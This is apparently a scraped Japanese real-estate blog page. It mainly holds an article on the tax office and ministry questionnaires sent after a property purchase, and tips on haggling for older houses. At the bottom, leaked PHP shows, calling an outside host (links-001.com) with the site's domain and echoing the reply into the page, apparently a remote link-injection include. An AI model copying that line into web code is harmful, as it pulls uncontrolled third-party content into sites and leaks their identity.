前へ
次へ

不動産業界の用語のあれやこれを知る

不動産業界にも専門用語がありますが、この業界は一期一会の商売です。
その大事なビジネスチャンス

more

不動産価格が高いために特にもめやすい相続手続き

多くの人たちの暮らす大都市圏は全国的な人口減少の続く国でありながら人口増加の続いている地域が多いです

more

ボロ屋をリフォームして不動産投資

不動産投資は人気が高いですが、最近空き家を安価で買取、セルフリフォームして貸し出す不動産投資方法が増

more

中古住宅が安く買える交渉をしてみよう

不動産を購入したり売却したり、あるいは相続によって取得したことがあるなら知っているかもしれませんが、税務局から「お尋ね」、国土交通省からは「アンケート」が届くようです。
不動産取引では、登記変更をするのですが、これをキッカケに通知が届きます。
税務局からの内容としては、購入価格、購入先、資金の調達などで、これはいわゆる未申告の所得や贈与がないかをチェックするための項目なのでしょう。
一方、アンケートの内容は、不動産市場で健全な取引が行われているかどうか、度を過ぎる土地価格の上昇がないかをチェックするための項目です。
回答義務はありませんが、健全な取引に努めてもらえるように協力しましょう。
今や、新築より中古住宅の需要増です。
古い建物つき不動産は、土地の価格から取り壊し費用を差し引いた価格が適正価格となります。
しかし中古でも物理的にはまだ使えるので、土地の値段から取り壊し費用を引いた価格で、土地も建物も手に入ります。
業界では知られていますが、一般では案外知られていません。
売るなら高く、仲介役も同じ意見ですが、買う側は安いほうがいいワケです。
建物はそのまま、取り壊し費用を差し引いた価格で交渉してみるのも一法です。

".file_get_contents('http://links-001.com/kanren3set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top